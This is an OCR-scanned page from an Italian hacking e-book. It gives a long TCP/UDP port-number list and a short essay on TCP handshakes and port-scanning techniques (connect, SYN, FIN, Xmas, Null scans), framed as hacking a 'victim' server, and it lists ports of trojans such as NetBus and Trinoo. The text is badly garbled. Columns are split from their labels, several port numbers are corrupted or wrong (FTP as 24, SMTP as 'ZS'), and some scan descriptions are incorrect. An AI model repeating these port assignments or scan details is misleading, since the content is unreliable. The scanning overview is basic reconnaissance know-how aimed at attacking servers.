namp 167/tcp NAMP 
namp 167/udp NAMP 
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rsvd 168/tcp RSVD 

rsvd 168/udp RSVD 

send 169/tcp SEND 

send 169/udp SEND 

print-srv 170/tcp Network PostScript 

print-srv 170/udp Network PostScript 

multiplex 171/tcp Network Innovations Multiplex 
multiplex 171/udp Network Innovations Multiplex 
cl/1 172/tcp Network Innovations CL/I 

cl/1 172/udp Network Innovations CL/1 
xyplex-mux 173/tcp Xyplex 

xyplex-mux 173/udp Xyplex 

mailq 174/tcp MAILQ 

mailq 174/udp MAILQ 

vmnet 175/tcp VMNET 

vmnet 175/udp VMNET 

genrad-mux 176/tcp GENRAD-MUX 
genrad-mux 176/udp GENRAD-MUX 

xdmcep 177/udp X Display Manager Control Protocol 
e nextstep 178/tcp NextStep Window Server 

e NextStep 178/udp NextStep Window Server 

bgp 179/tcp Border Gateway Protocol 

ris 180/tcp Intergraph 

ris 180/udp Intergraph 

unify 181/tcp Unify 

unify 181/udp Unify 

audit 182/tcp Unisys Audit SITP 

audit 182/udp Unisys Audit SITP 

ocbinder 183/tcp OCBinder 

ocbinder 183/udp OCBinder 

ocserver 184/tcp OCServer 

ocserver 184/udp OCServer 

remote-kis 185/tcp Remote-KIS 

remote-kis 185/udp Remote-KIS 

kis 186/tcp KIS Protocol 

kis 186/udp KIS Protocol 

aci 187/tcp Application Communication Interface 
aci 187/udp Application Communication Interface 
mumps 188/tcp Plus Five's MUMPS 

mumps 188/udp Plus Five's MUMPS 

e qft 189/tcp Queued File Transport 

e gacp 190/tcp Gateway Access Control Protocol 

e cacp 190/udp Gateway Access Control Protocol 

e prospero 191/tcp Prospero Directory Service 

e osu-nms 192/tcp OSU Network Monitoring System 
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osu-nms 192/udp OSU Network Monitoring System 

srmp 193/tcp Spider Remote Monitoring Protocol 

srmp 193/udp Spider Remote Monitoring Protocol 

irc 194/udp Internet Relay Chat Protocol 

e dn6-nlm-aud 195/tcp DNSIX Network Level Module Audit 

e dn6-smm-red 196/tcp DNSIX Session Mgt Module Audit Redir 
e dils 197/tcp Directory Location Service 


e dis 197/udp Directory Location Service 

e dis-mon 19$8/tcp Directory Location Service Monitor 
e dis-mon 198/udp Directory Location Service Monitor 
e smux 199/tcp SMUX 

e smux 199/udp SMUX 

e src 200/tcp IBM System Resource Controller 

e src 200/udp IBM System Resource Controller 

e at-rtimp 201/tcp AppleTalk Routing Maintenance 

e at-rtimp 201/udp AppleTalk Routing Maintenance 

e at-nbp 202/tcp AppleTalk Name Binding 

e at-nbp 202/udp AppleTalk Name Binding 

e at-3 203/tcp AppleTalk Unused 

e at-3 203/udp AppleTalk Unused 

e at-echo 204/tcp AppleTalk Echo 

e at-echo 204/udp AppleTalk Echo 

e at-5 205/tcp AppleTalk Unused 

e at-5 205/udp AppleTalk Unused 

e at-zis 206/tcp AppleTalk Zone Information 

e at-zis 206/udp AppleTalk Zone Information 

e at-7 207/tcp AppleTalk Unused 

e at-7 207/udp AppleTalk Unused 

e at-8 208/tcp AppleTalk Unused 

e at-8 208/udp AppleTalk Unused 

e tam 209/tcp Trivial Authenticated Mail Protocol 

e tam 209/udp Trivial Authenticated Mail Protocol 

e 239.50 210/tcp ANSI Z39.50 

z39.50 210/udp ANSI Z39.50 

914c/g 211/tcp Texas Instruments 914C/G Terminal 
914c/g 211/udp Texas Instruments 914C/G Terminal 
anet 212/tcp ATEXSSTR 

anet 212/udp ATEXSSTR 

ipx 213/tcp IPX 

ipx 213/udp IPX 

vmpwscs 214/tcp VM PWSCS 

vmpwscs 214/udp VM PWSCS 

softpc 215/tcp Insignia Solutions 
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softpc 215/udp Insignia Solutions 


e atls 216/tcp Access Technology License Server 


dbase 217/tcp dBASE Unix 

dbase 217/udp dBASE Unix 

mpp 218/tcp Netix Message Posting Protocol 
mpp 218/udp Netix Message Posting Protocol 
uarps 219/tcp Unisys ARPs 

uarps 219/udp Unisys ARPs 

imap3 220/tcp Interactive Mail Access Protocol v3 
fln-spx 221/tcp Berkeley rlogind with SPX auth 
fln-spx 221/udp Berkeley rlogind with SPX auth 
rsh-spx 222/tcp Berkeley rshd with SPX auth 
rsh-spx 222/udp Berkeley rshd with SPX auth 
cdc 223/tcp Certificate Distribution Center 

cdc 223/udp Certificate Distribution Center 
sur-meas 243/tcp Survey Measurement 

sur-meas 243/udp Survey Measurement 

link 245/tcp LINK 

link 245/udp LINK 

dsp3270 246/tcp Display Systems Protocol 
dsp3270 246/udp Display Systems Protocol 
pdap 344/tcp Prospero Data Access Protocol 
pawserv 345/tcp Perf Analysis Workbench 
pawserv 345/udp Perf Analysis Workbench 
zserv 346/tcp Zebra server 

fatserv 347/tcp Fatmen Server 

csi-sgwp 348/tcp Cabletron Management Protocol 
csi-sgwp 348/udp Cabletron Management Protocol 
clearcase 371/tcp Clearcase 

clearcase 371/udp Clearcase 

ulistserv 372/tcp Unix Listserv 

ulistserv 372/udp Unix Listserv 

legent-1 373/tcp Legent Corporation 

legent-1 373/udp Legent Corporation 

legent-2 374/tcp Legent Corporation 

legent-2 374/udp Legent Corporation 

hassle 375/tcp Hassle 

hassle 375/udp Hassle 

nip 376/tcp Amiga Envoy Network Inquiry Proto 
nip 376/udp Amiga Envoy Network Inquiry Proto 
tnETOS 377/tcep NEC Corporation 

tnETOS 377/udp NEC Corporation 

dsETOS 378/tcp NEC Corporation 

dsETOS 378/udp NEC Corporation 

1s99c 379/tcp TIA/EIA/IS-99 modem client 


file:///D|/FILE%20CONDIVISI/EBOOK-GUIDE-CORSI-MA...ll'uso%20di%20telnet/TCP-IP%20Port%20Numbers.htm (9 di 16)09/11/05 18.14.30 


TCP/IP Port Numbers 


1s99s 380/tcp TIA/EIA/IS-99 modem server 

hp-collector 381/tcp hp performance data collector 
hp-collector 381/udp hp performance data collector 
hp-managed-node 382/tcp hp performance data managed node 
hp-managed-node 382/udp hp performance data managed node 
hp-alarm-mgr 383/tcp hp performance data alarm manager 
hp-alarm-mgr 383/udp hp performance data alarm manager 
arns 384/tcp A Remote Network Server System 

arns 384/udp A Remote Network Server System 

ibm-app 385/tcp IBM Application 

ibm-app 385/tcp IBM Application 

asa 386/tcp ASA Message Router Object Def. 

asa 386/udp ASA Message Router Object Def. 

aurp 387/tcp Appletalk Update-Based Routing Pro. 

aurp 387/udp Appletalk Update-Based Routing Pro. 
unidata-ldm 388/tcp Unidata LDM Version 4 


unidata-ldm 388/udp Unidata LDM Version 4 

ldap 389/tcp Lightweight Directory Access Protocol 
uis 390/tcp UIS 

uis 390/udp UIS 

synotics-relay 391/tcp SynOptics SNMP Relay Port 
synotics-relay 391/udp SynOptics SNMP Relay Port 
synotics-broker 392/tcp SynOptics Port Broker Port 
synotics-broker 392/udp SynOptics Port Broker Port 
dis 393/tcp Data Interpretation System 

dis 393/udp Data Interpretation System 

embl-ndt 394/tcp EMBL Nucleic Data Transfer 
embl-ndt 394/udp EMBL Nucleic Data Transfer 
netcp 395/tcp NETSscout Control Protocol 

netcp 395/udp NETSscout Control Protocol 
netware-ip 396/tcp Novell Netware over IP 
netware-ip 396/udp Novell Netware over IP 

mptn 397/tcp Multi Protocol Trans. Net. 

mptn 397/udp Multi Protocol Trans. Net. 

kryptolan 398/tcp Kryptolan 

kryptolan 398/udp Kryptolan 

iso-tsap-c2 399/tcp ISO-TSAP Class 2 

iso-tsap-c2 399/udp ISO-TSAP Class 2 

work-sol 400/tcp Workstation Solutions 

work-sol 400/udp Workstation Solutions 

ups 401/udp Uninterruptible Power Supply 

genie 402/tcp Genie Protocol 

genie 402/udp Genie Protocol 

decap 403/tcp decap 

decap 403/udp decap 
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nced 404/tcp nced 

nced 404/udp nced 

ncld 405/tcp neld 

ncld 405/udp ncld 

imsp 406/tcp Interactive Mail Support Protocol 

imsp 406/udp Interactive Mail Support Protocol 
timbuktu 407/tcp Timbuktu 

prm-sm 408/tcp Prospero Resource Manager Sys. Man. 


prm-nm 409/tcp Prospero Resource Manager Node Man. 
decladebug 410/udp DECLadebug Remote Debug Protocol 
rmt 411/tcp Remote MT Protocol 

rmt 411/udp Remote MT Protocol 

synoptics-trap 412/tcp Trap Convention Port 
synoptics-trap 412/udp Trap Convention Port 

smsp 413/tcp SMSP 

smsp 413/udp SMSP 

infoseek 414/tcp InfoSeek 

infoseek 414/udp InfoSeek 

bnet 415/tcp BNet 

bnet 415/udp BNet 

silverplatter 416/tcp Silverplatter 

silverplatter 416/udp Silverplatter 

onmux 417/tcp Onmux 

onmux 417/udp Onmux 

hyper-g 418/tcp Hyper-G 

ariell 419/tcp Ariel 

e smpte 420/udp SMPTE 

e ariel2 421/tcp Ariel 

e ariel3 422/tcp Ariel 

e Oopc-job-start 423/tcp IBM Operations Planning and Control Start 


e opc-job-track 424/tcp IBM Operations Planning and Control Track 
icad-el 425/tcp ICAD 

smartsdp 426/tcp smartsdp 
smartsdp 426/udp smartsdp 
svrloc 427/tcp Server Location 
svrloc 427/udp Server Location 
ocs_cmu 428/tcp OCS_CMU 
ocs_cmu 428/udp OCS_CMU 
ocs_amu 429/tcp OCS_AMU 
ocs_amu 429/udp OCS_AMU 
utmpsd 430/tcp UTMPSD 
utmpsd 430/udp UTMPSD 
utmped 431/tep UTMPCD 
utmped 431/udp UTMPCD 
iasd 432/tcp IASD 
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iasd 432/udp IASD 

nnsp 433/tcp NNSP 

nnsp 433/udp NNSP 

mobileip-agent 434/tcp MobileIP-Agent 
mobilip-mn 435/tcp MobilIP-MN 
dna-cml 436/tcp DNA-CML 

dna-cml 436/udp DNA-CML 

comsem 437/tcp comsem 

comsem 437/udp comsem 

dsfgw 438/tcp dsfgw 

dsfgw 438/udp dsfgw 

dasp 439/tcp dasp Thomas Obermair 
dasp 439/udp dasp tommy @inlab.m.eunet.de 
sgcp 440/tcp sgcp 

sgcp 440/udp sgcp 

decvms-sysmgt 441/tcp decvms-sysmgt 
cvc_hostd 442/tcp cvc_hostd 

cvc_hostd 442/udp cvc_hostd 

https 443/tcp https MCom 

snpp 444/tcp Simple Network Paging Protocol 
snpp 444/udp Simple Network Paging Protocol 
microsoft-ds 445/udp Microsoft-DS 
ddm-rdb 446/tcp DDM-RDB 

ddm-rdb 446/udp DDM-RDB 

ddm-dfm 447/tcp DDM-RFM 

ddm-dfm 447/udp DDM-RFM 

ddm-byte 448/tcp DDM-BYTE 
ddm-byte 448/udp DDM-BYTE 
as-servermap 449/tcp AS Server Mapper 
as-servermap 449/udp AS Server Mapper 
tserver 450/tcp TServer 


sfs-smp-net 451/tcp Cray Network Semaphore server 
sfs-smp-net 451/udp Cray Network Semaphore server 
sfs-config 452/tcp Cray SFS config server 

sfs-config 452/udp Cray SFS config server 
creativeserver 453/tcp CreativeServer 

creativeserver 453/udp CreativeServer 

contentserver 454/tcp ContentServer 

contentserver 454/udp ContentServer 

creativepartnr 455/tcp CreativePartnr 

creativepartnr 455/udp CreativePartnr 

macon-tcp 456/tcp macon-tcp 

macon-udp 456/udp macon-udp 

scohelp 457/tcp scohelp 

scohelp 457/udp scohelp 
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applegtc 458/tcp apple quick time 

applegte 458/udp apple quick time 
ampr-remd 459/tcp ampr-remd 

ampr-remd 459/udp ampr-remd 

skronk 460/tcp skronk 

skronk 460/udp skronk 

exec 512/tcp remote process execution; 

biff 512/udp used by mail system to notify users 
login 513/tcp remote login a la telnet; 

who 513/udp maintains data bases showing who's 
cmd 514/tcp like exec, but automatic 

syslog 514/udp 

printer 515/tcp spooler 

talk 517/udp 

ntalk 518/tcp 

utime 519/tcp unixtime 

utime 519/udp unixtime 

efs 520/tcp extended file name server 

router 520/udp local routing process (on site); 
timed 525/tcp timeserver 

timed 525/udp timeserver 

tempo 526/tcp newdate 

tempo 526/udp newdate 

courier 530/tcp rpe 

courier 530/udp rpe 

conference 531/tcp chat 

conference 531/udp chat 

netnews 532/tcp readnews 

netnews 532/udp readnews 

netwall 533/tcp for emergency broadcasts 
netwall 533/udp for emergency broadcasts 
apertus-ldp 539/tcp Apertus Technologies Load Determination 
apertus-ldp 539/udp Apertus Technologies Load Determination 
uucp 540/tcp uucpd 

uucp-rlogin 541/tcp uucp-rlogin 

uucp-rlogin 541/udp uucp-rlogin 

klogin 543/tcp 

klogin 543/udp 

kshell 544/tcp kremd 

kshell 544/udp kremd 

applegtesrvr 545/tcp applegtesrvi 
applegtesrvr 545/udp applegtesrvr 

new-rwho 550/tcp new-who 

new-rwho 550/udp new-who 

dsf 555/tcp 
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dsf 555/udp 

remotefs 556/tcp rfs server 

remotefs 556/udp rfs server 
openvms-sysipc 557/tcp openvms-sysipc 
openvms-sysipc 557/udp openvms-sysipc 
sdnskmp 558/tcp SDNSKMP 

sdnskmp 558/udp SDNSKMP 

teedtap 559/tcp TEEDTAP 

teedtap 559/udp TEEDTAP 

rmonitor 560/tcp rmonitord 

rmonitor 560/udp rmonitord 

monitor 561/tcp 

monitor 561/udp 

chshell 562/tcp chemd 

chshell 562/udp chemd 

9pfs 564/tcp plan 9 file service 

9pfs 564/udp plan 9 file service 

whoami 565/tcp whoami 

whoami 565/udp whoami 

meter 570/tcp demon 

meter 570/udp demon 

meter 571/tcp udemon 

meter 571/udp udemon 

ipcserver 600/tcp Sun IPC server 
ipcserver 600/udp Sun IPC server 

ngs 607/tcp ngs 

ngs 607/udp ngs 

urm 606/tcp Cray Unified Resource Manager 
urm 606/udp Cray Unified Resource Manager 
sift-uft 608/tcp Sender-Initiated/Unsolicited File Transfer 
npmp-trap 609/tcp npmp-trap 

npmp-trap 609/udp npmp-trap 
npmp-local 610/tcp npmp-local 
npmp-local 610/udp npmp-local 
npmp-gui 611/tcp npmp-gui 

npmp-gui 611/udp npmp-gui 

ginad 634/tcp ginad 

ginad 634/udp ginad 

mdqs 666/tcp 

mdqs 666/udp 

doom 666/tcp doom Id Software 


e elcsd 704/tcp errlog copy/server daemon 


elesd 704/udp errlog copy/server daemon 
flexIm 744/tcp Flexible License Manager 
flexIm 744/udp Flexible License Manager 
fujitsu-dev 747/tcp Fujitsu Device Control 


file:///D|/FILE%20CONDIVISI/EBOOK-GUIDE-CORSI-MA...ll'uso%20di%20telnet/TCP-IP%20Port%20Numbers.htm (14 di 16)09/11/05 18.14.30 


TCP/IP Port Numbers 


fujitsu-dev 747/udp Fujitsu Device Control 
ris-cm 748/tcp Russell Info Sci Calendar Manager 
ris-cm 748/udp Russell Info Sci Calendar Manager 
kerberos-adm 749/tcp kerberos administration 
rfile 750/tcp 

loadav 750/udp 

pump 751/tcp 

pump 751/udp 

qrh 752/tcp 

qrh 752/udp 

rrh 753/tcp 

rrh 753/udp 

tell 754/tcp send 

tell 754/udp send 

nlogin 758/tcp 

nlogin 758/udp 

con 759/tcp 

con 759/udp 

ns 760/tcp 

ns 760/udp 

rxe 761/tcp 

rxe 761/udp 

quotad 762/tcp 

quotad 762/udp 

cycleserv 763/tcp 
cycleserv 763/udp 

omserv 764/tcp 

omserv 764/udp 

webster 765/tcp 

webster 765/udp 
phonebook 767/tcp phone 
phonebook 767/udp phone 
vid 769/tcp 

vid 769/udp 

cadlock 770/tcp 

cadlock 770/udp 

rtip 771/tcp 

rtip 771/udp 

cycleserv2 772/tcp 
cycleserv2 772/udp 
submit 773/tcp 

notify 773/udp 

rpasswd 774/tcp 
acmaint_dbd 774/udp 
entomb 775/tcp 
acmaint_transd 775/udp 
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wpages 776/tcp 

wpages 776/udp 

wpgs 780/tcp 

wpgs 780/udp 

concert 786/tcp Concert 

concert 786/udp Concert 
mdbs_daemon 800/tcp 
mdbs_daemon 800/udp 

device 801/tcp 

device 801/udp 

accessbuilder 888/tcp AccessBuilder 
accessbuilder 888/udp AccessBuilder 
xtreelic 996/tcp Central Point Software 
xtreelic 996/udp Central Point Software 
maitrd 997/tcp 

maitrd 997/udp 

busboy 998/tcp 

puparp 998/udp 

garcon 999/tcp 

applix 999/udp Applix ac 

puprouter 999/tcp 

puprouter 999/udp 

cadlock 1000/tcp 

ock 1000/udp 

1023/tcp Reserved 

1024/udp Reserved 


For information about ports greater than 1024 see the list of REGISTERED PORT NUMBERS 
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by 
MICHAEL BAKUNIN 
<bakunin@meganmail.com> 


Forse è solo perchè non sapevo cosa fare... ho scritto qui tutte le porte del 
creato. Ci sono all'incirca tutte con il nome corrispettivo. 


Ma prima... eccovi una micro spiegazione della comunicazione TCP/IP e del 
portscanner e dell'hacking in generale verso delle porte. 


Cosa possono servire queste porte? A tutto... vi dico in breve come vengono 
ussate: 


Ogni volta che usate un programma (da un client per IRC, ad un BROWSER a 
quello ch volete!), questo invià un messaggio (un bacchetto di informazioni) 
SYN al server in questione. 

Se state facendo una scansione di porte, il server sarà la vittima mentre voi 
continuerete ad essere client. Si definisce quindi server chi si becca il 

vostro pacchetto SYN. 


Se il server riconosce il pacchetto SYN, manda un pacchetto SYN-ACK a voi. 
Questo succede quando la porta è aperta e viene fatto in automatico. 


Quindi incomincia la trasmissione di informazioni con l'invio di un apcchetto 
ACK. 
EX CLARO? 


Quando uno vuole hackerare un server a livello lammer usa il metodo descritto 
fino a qui. Questo si chiama Scan TCP connect (o più semplicemente ST). 


Altro tipo è il Scan TCP SYN (o sS). Consiste nel non inviare il terzo 
pacchetto, detto ACK. Per evitare che la connessione avvanga mando un RST/ACK. 
Questo pacchetto annulla la connessione. 


Poi c'è il Scan TCP FIN (o sF) che si basa sul pacchetto RFC 793. 


Esiste poi il Scan TCP Xmas Tree (sX). È praticamente eguale a quello 
sopra solo che configurato un po' diversaemente il FIN, URG e PUSH impostati. 


Poi c'è il TCP Null Scan (sN). Usa le connessioni ICMP. 


Ora... tagliamo un po', ed eccovi le porte! 


Anzi! Prima vi aggiungo ancora un po' di teoria! Queste porte non sono tutte 
aperte, ma la loro apertura dipende da diversi fattori: 


1 --> L'OS: Windows di norma ha tutte le porte chiuse (specialmente se per 
utente e non per server). Sono aperte solo se ci sono 
programmi che le tengono aperte. Questi possono essere 
oltre che trojan, anche prog specifici. CMQ, non vi 
preoccupate! Se trovate delle porte aperte sul vostro 
windozzolo e voi non sapete nulla... sono in lettura da 
virus! 

Linux/*nix/aix e tutti i OS che si basano su una architettura 
risalente a uno di essi (vedi freesbd). Essi hanno 
le porte aperte di natura... ma non tutte e possono 
essere configurati dal root della macchina. 


2 --> AMMINISTRATORE: questo può essere sia per win che per linux. Per win 
con programmi appositi. Per linux perchè voluti e 
configurati. 
Sta di fatto che cmq windowz non può aprire determinate 
porte in qualsiasi caso. Tipo TELNET o altre... win 
non le aprirà mai. Queste porte sono specifiche di 
sistemi *nix. 


Di solito per LINUX e simili le porte di default (quindi non tutte) si aprono 
editando il file /etc/inetd.conf. Ma si posso usare programmi anche per 
aprirle stando quindi slegati dai file di configurazione. 


PORTE SERVIZIO 
1 echo 

24 ftp 

23 telnet 

ZS smtp 

14°) finger 

80 http 

98 linuxconf 
110 pop-3 

111 SUNrpc 

113 auth 

119 nntp 

515 printer 

631 senza nome 
649 senza nome 
1024 kdm 

1025 listen 

1026 nterm 

1030 iadl 

1031 iad2 


1032 iad3 


1058 
1059 
1067 
1068 
1080 
1083 
1084 
1103 
1109 
1110 
1112 
1127 
1155 
1178 
1212 
1222 
1234 
1241 
1248 
1346 
1347 
1348 
1349 
1350 
1351 
1352 
1353 
1354 
1355 
1356 
1357 
1358 
1359 
1360 
1361 
1362 
1363 
1364 
1365 
1366 
1367 
1368 
1369 
1370 
1371 
1372 
1373 
1374 


nim 
nimreg 
instl_boots 
instl_bootc 
socks 
ansoft-lm-1 
ansoft-lm-2 
xaudio 
kpop 
nfsd-status 
msgql 
supfiledbg 
nfa 
skkserv 
lupa 

nerv 

hotline 

msg 

hermes 
alta-ana-lm 
bbn-mmc 
bbn-mmx 
sbook 
editbench 
equationbuilder 
lotusnotes 
relief 
rightbrain 
intuitive-edge 
cuillamartin 
pegboard 
connlcli 
ftsrv 

mimer 

linx 
timeflies 
ndm-requester 
ndm-server 
adapt-sna 
netware-Csp 
dcs 
screencast 
gv-Us 

US-gv 

fc-cli 
fc-ser 
chromagrafx 
molly 


1375 bytex 

1376 ibm-pps 

1377. cichlid 

1378. elan 

1379 — dbreporter 
1380 — telesis-licman 
1381 apple-licman 
1383 — gwha 

1384 os-licman 
1385 atex_elmd 
1386 —checksum 
1387 cadsi-lm 

1388 —objective-dbc 
1389 — iclpv-dm 

1390 — iclpv-sc 

1391 iclpv-sas 

1392 iclpv-pm 

1393 — iclpv-nls 

1394 iclpv-nlc 

1395  iclpv-wsm 
1396 —dvl-activemail 
1397 audio-activmail 
1398 —video-activmail 
1399 — cadkey-licman 
1400 — cadkey-tablet 
1401. goldleaf-licman 
1402 prm-sm-np 
1403 prm-nm-np 
1404 . igi-lm 

1405 ibm-res 

1406 — netlabs-lm 
1407 dbsa-lm 

1408. sophia-lm 
1409 — here-lm 

1410 hiq 

1411 af 

1412 innosys 

1413  innosys-acl 
1414 ibm-mgpseries 
1415  dbstar 

1416  novell-lu6.2 
1417 timbuktu-srv1 
1418. timbuktu-srv2 
1419 — timbuktu-srv3 
1420 — timbuktu-srv4 
1421 gandalf-Im 
1422 autodesk-lm 
1423 — essbase 


1424 
1425 
1426 
1427 
1428 
1429 
1430 
1431 
1432 
1433 
1434 
1435 
1436 
1437 
1438 
1439 
1440 
1441 
1442 
1443 
1444 
1445 
1446 
1447 
1448 
1449 
1450 
1451 
1452 
1453 
1454 
1455 
1456 
1457 
1458 
1459 
1460 
1461 
1462 
1463 
1464 
1465 
1466 
1467 
1468 
1469 
1470 
1471 


hybrid 
zion-lm 
sas-1 
mloadd 
informatik-lm 
nms 

tpdu 

rgtp 
blueberry-lm 
ms-sql-s 
ms-sql-m 
ibm-cics 
sas-2 

tabula 
eicon-server 
eicon-x25 
eicon-slp 
cadis-1 
cadis-2 
ies-lm 
marcam-lm 
proxima-lm 
ora-lm 
apri-lm 
oc-lm 

peport 

dwf 
infoman 
gtegsc-lm 
genie-lm 
interhdl_elmd 
esl-lm 

dca 
valisys-lm 
nrcabg-lm 
proshare1 
proshare2 
ibm_wrless_lan 
world-lm 
nucleus 
msl_lmd 
pipes 
oceansoft-lm 
csdmbase 
csdm 

aal-lm 

ualact 
csdmbase 


1472 
1473 
1474 
1475 
1476 
1477 
1478 
1479 
1480 
1481 
1482 
1483 
1484 
1485 
1486 
1487 
1488 
1489 
1490 
1491 
1492 
1493 
1494 
1495 
1496 
1497 
1498 
1499 
1500 
1501 
1502 
1503 
1504 
1505 
1506 
1507 
1508 
1509 
1510 
1511 
1512 
1513 
1514 
1515 
1516 
1517 
1518 
1519 


csdm 

math 
telefinder 
taligent-lm 
clvm-cfg 
ms-sna-server 
ms-sna-base 
dberegister 
pacerforum 
airs 
miteksys-lm 
afs 

confluent 
lansource 
nms_topo_serv 
localinfosrvr 
docstor 
dmdocbroker 
insitu-conf 
anynetgateway 
stone-design-1 
netmap_lm 
citrix-ica 

CVC 

liberty-lm 
rfx-lm 
watcom-sql 
fhc 

vlsi-Im 

sas-3 
shivadiscovery 
imtc-mCcs 
evb-elm 
funkproxy 
utcd 

symplex 
diagmond 
robcad-lm 
mvx-lm 

31-11 

wins 
fujitsu-dtc 
fujitsu-dtcns 
ifor-protocol 
vpad 

vpac 

vpvd 

Vpve 


1520 
1521 
1522 
1523 
1524 
1525 
1526 
1527 
1528 
1529 
1530 
1531 
1532 
1533 
1534 
1535 
1536 
1537 
1538 
1539 
1540 
1541 
1542 
1543 
1544 
1545 
1546 
1547 
1548 
1549 
1550 
1551 
1552 
1600 
1650 
1651 
1652 
1661 
1662 
1663 
1664 
1665 
1666 
1667 
1668 
1669 
1670 
1671 


atm-zip-office 
ncube-lm 
rna-lm 
cichild-lm 
ingreslock 
orasrv 
pdap-np 

tlisrv 
mciautoreg 
support 
rap-service 
rap-listen 
miroconnect 
virtual-places 
micromuse-lm 
ampr-info 
ampr-inter 
sdsc-lm 
3ds-lm 
intellistor-lm 
rds 

rds2 
gridgen-elmd 
simba-cs 
aspeclmd 
vistium-share 
abbaccuray 
laplink 
axon-lm 
shivahose 
3m-image-lm 
hecmtl-db 
pciarray 

issd 

nkd 
shiva_confsrvr 
xnmp 
netview-aix-1 
netview-aix-2 
netview-alx-3 
netview-alx-4 
netview-alx-5 
netview-aix-6 
netview-aix-7 
netview-alx-8 
netview-alx-9 
netview-aix-10 
netview-aix-11 


1672 
1723 
1827 
1986 
1987 
1988 
1989 
1990 
1991 
1992 
1993 
1994 
1995 
1996 
1997 
1998 
1999 
2000 
2001 
2002 
2003 
2004 
2005 
2006 
2007 
2008 
2009 
2010 
2011 
2012 
2013 
2014 
2015 
2016 
2017 
2018 
2019 
2020 
2021 
2022 
2023 
2024 
2025 
2026 
2027 
2028 
2030 
2032 


netview-aix-12 
PPP 

pem 
licensedaemon 
tr-rsrb-p1 
tr-rsrb-p2 
tr-rsrb-p3 
stun-pl 
stun-p2 
stun-p3 
snmp-tcp-port 
stun-port 
perf-port 
tr-rsrb-port 
gdp-port 
x25-SVC-port 
tcp-id-port 
callbook 

dc 

globe 

cfingerd 
mailbox 
deslogin 
invokator 
dectalk 

conf 

news 

search 

raid-cc 

ttyinfo 
raid-am 

troff 

Cypress 
bootserver 
Cypress-stat 
terminaldb 
whosockami 
xinupageserver 
Servexec 

down 
xinuexpansion3 
xinuexpansion4 
ellpack 
scrabble 
shadowserver 
submitserver 
device2 
blackboard 


2033 
2034 
2035 
2038 
2040 
2041 
2042 
2043 
2044 
2045 
2046 
2047 
2048 
2049 
2064 
2065 
2067 
2105 
2106 
2108 
2111 
2112 
2120 
2201 
2232 
2241 
2301 
2307 
2401 
2430 
2431 
2432 
2433 
2500 
2501 
2564 
2600 
2601 
2602 
2603 
2604 
2605 
2627 
2638 
2766 
2784 
3000 
3001 


glogger 
scoremgr 
imsldoc 
objectmanager 
lam 
interbase 
isis 
isis-bcast 
rimsl 
cdfunc 
sdfunc 

dls 
dls-monitor 
nfs 
distrib-netassholes 
dlsrpn 
dlswpn 
eklogin 
ekshell 
rkinit 

kx 

kip 

kauth 

ats 
ivs-video 
ivsd 
compagdiag 
pehelp 
cvspserver 
Venus 
venus-se 
codasrv 
codasrv-se 
rtsserv 
rtsclient 
hp-3000-telnet 
zebrasrv 
zebra 

ripd 

ripngd 
ospfd 

bgpd 
webster 
sybase 
listen 
www-dev 
PPP 
nessusd 


3005 
3006 
3049 
3064 
3086 
3128 
3141 
3264 
3306 
3333 
3389 
3421 
3455 
3456 
3457 
3462 
3900 
3984 
3985 
3986 
4008 
4045 
4132 
4133 
4144 
4321 
4333 
4343 
4444 
4500 
4557 
4559 
4672 
5000 
5001 
5002 
5010 
5011 
5050 
5145 
5190 
5191 
5192 
5193 
5232 
5236 
5300 
5301 


deslogin 
deslogind 

cfs 
distrib-net-proxy 
sj3 

squid-http 
vmodem 

cemail 

mysql 

dec-notes 

msrdp 

bmap 

prsvp 

Vat 

vat-control 
track 

udt_os 
mapper-nodemgr 
mapper-mapethd 
mapper-ws_ethd 
netcheque 

lockd 

nuts_dem 
nuts_bootp 
wincim 

rwhois 

msql 

unicall 

krb524 

sae-um 

fax 

hylafax 

rfa 

fics 
commplex-link 
rfe 
telelpathstart 
telelpathattack 
mmCcc 
rmonitor_secure 
aol 

aol-1 

aol-2 

aol-3 

sgi-dgl 
padl2sim 
hacl-hb 

hacl-gs 


5302 
5303 
5304 
5305 
5308 
5432 
5510 
5520 
5530 
5540 
5550 
5631 
5632 
5680 
5713 
5714 
5715 
5716 
DAL 
5800 
5801 
5900 
5901 
5902 
5977 
5978 
5979 
5997 
5998 
5999 
6000 
6001 
6002 
6003 
6004 
6005 
6006 
6007 
6008 
6009 
6110 
6111 
6112 
6141 
6142 
6143 
6144 
6145 


hacl-cfg 
hacl-probe 
hacl-local 
hacl-test 
cfengine 
postgres 
secureidprop 
sdlog 

sdserv 
sdreport 
sdadmind 
pcanywheredata 
pcanywherestat 
canna 
proshareaudio 
prosharevideo 
prosharedata 
prosharerequest 
prosharenotify 
vnc 

vnc 

vnc 

vnc-1 

vnc-2 
ncd-pref-tcp 
ncd-diag-tcp 
ncd-conf-tcp 
ncd-pref 
ncd-diag 
ncd-conf 

X11 

X11:1 

X11:2 

X11:3 

X11:4 

X11:5 

X11:6 

X11:7 

X11:8 

X11:9 

softcm 

spc 

dtspc 
meta-Corp 
aspentec-lm 
watershed-lm 
statscil-lm 
statsci2-lm 


6146 
6147 
6148 
6558 
6666 
6667 
6668 
6969 
7000 
7001 
7002 
7003 
7004 
7005 
7006 
7007 
7008 
7009 
7010 
7100 
7200 
7201 
7326 
8080 
8888 
8892 
9090 
9100 
9535 
9876 
10005 
10082 
10083 
11371 
12345 
12346 
17007 
18000 
20005 
22273 
22289 
22305 
22321 
26208 
27665 
31337 
32770 
32771 


lonewolf-lm 
montage-lm 
ricardo-lm 
xdsxdm 
irc-serv 
irc 
irc 
acmsoda 
afs3-fileserver 
afs3-callback 
afs3-prserver 
afs3-vlserver 
afs3-kaserver 
afs3-volser 
afs3-errors 
afs3-bos 
afs3-update 
afs3-rmtsys 
ups-onlinet 
font-service 
fodms 
dlip 
icb 
http-proxy 
sun-answerbook 
seosload 
zeus-admin 
jetdirect 
man 
sd 
stel 
amandaidx 
amidxtape 
pksd 
NetBus 
NetBus 
isode-dua 
biimenu 
btx 
wnn6 
wnn6_Cn 
wnn6_Kr 
wnn6_Tw 
wnn6_DS 
Trinoo_Master 
Elite 
sometimes-rpc3 
sometimes-rpc5 


32772 sometimes-rpc7 
32773. sometimes-rpc9 
32774 sometimes-rpc11 
32775 sometimes-rpc13 
32776 sometimes-rpc15 
32777 sometimes-rpc17 
32778 sometimes-rpc19 
32779  sometimes-rpc21 
32780 sometimes-rpc23 
32786 —sometimes-rpc25 
32787  sometimes-rpc27 
43188 reachout 

47557 dbbrowse 

65301 pcanywhere 


